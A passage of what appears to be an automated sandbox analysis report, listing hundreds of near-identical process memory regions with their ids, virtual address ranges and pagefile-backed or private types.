= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19126 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19127 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19128 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19129 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19130 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19131 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19132 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19133 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19158 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19159 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19160 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19161 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
19162 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19163 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19164 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19165 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19166 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19167 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19168 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19169 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19170 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19171 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19172 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19173 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19174 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 19175 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19176 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19177 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19178 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19179 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19180 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19181 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19182 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19183 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19184 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19185 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19186 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19187 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 19188 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19189 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19190 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19191 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19192 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19193 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19194 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19195 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19196 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19197 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19198 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19199 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19200 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19201 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19202 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19203 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19204 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19205 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19206 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19207 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19208 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19209 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19210 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19211 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19212 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19213 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19214 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19215 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19216 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19217 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19218 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19219 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19360 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19361 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19362 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19363 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19364 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19365 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19366 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19367 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19368 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19369 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19370 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19371 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19372 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19373 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19374 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19375 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19376 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19377 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19378 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 19379 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19380 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19381 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19382 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19383 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19384 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19385 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19386 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19387 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19388 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19389 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19390 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19391 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 19392 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19393 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19394 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19395 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19396 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19397 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19398 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19399 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19400 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19401 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19402 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19403 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19404 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19405 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19406 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19407 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19408 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19409 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19410 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19411 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19412 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19413 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19414 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19415 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19416 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19417 start_va = 0x2a0000 end_va = 
0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19418 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19419 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19420 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19421 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19422 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19423 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19424 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19425 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19426 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19427 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19428 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19429 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19430 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19431 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19432 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19433 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19434 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19435 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19436 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19437 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19438 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19439 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19440 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19441 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19442 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 19443 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19444 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19445 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19446 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19447 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19448 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19449 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19450 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19451 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19452 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19453 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19454 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19455 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 19456 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19457 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19458 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19459 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19460 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19461 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19462 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19463 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19464 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19465 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19605 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19606 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19607 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19608 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19609 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19610 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19611 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19612 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19613 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19614 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19615 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19616 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19617 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19618 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19619 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19620 start_va = 0x2a0000 end_va = 0x2b0fff 
